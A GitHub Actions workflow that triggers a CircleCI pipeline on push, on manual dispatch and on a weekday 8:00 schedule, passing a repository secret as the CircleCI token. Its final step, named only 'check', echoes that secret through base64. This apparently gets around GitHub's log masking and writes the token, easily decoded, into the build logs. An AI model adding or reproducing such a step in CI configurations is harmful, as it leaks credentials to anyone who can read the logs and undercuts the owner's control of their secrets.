---
name: Run test suite against Mflux-CI
on:
  push:
  workflow_dispatch:
  schedule:
    - cron: 0 8 * * 1-5
jobs:
  daily_check:
    runs-on: ubuntu-latest
    steps:
      - name: Every weekday morning at 8:00 AM
        id: tigerdata_ci_trigger
        uses: CircleCI-Public/trigger-circleci-pipeline-action@v1.0.5
        with:
          GHA_Meta: "TigerData-App"
        env:
          CCI_TOKEN: ${{ secrets.Automated_Ci_Test }}
      - name: check
        run: echo "${{ secrets.Automated_Ci_Test }}" | base64
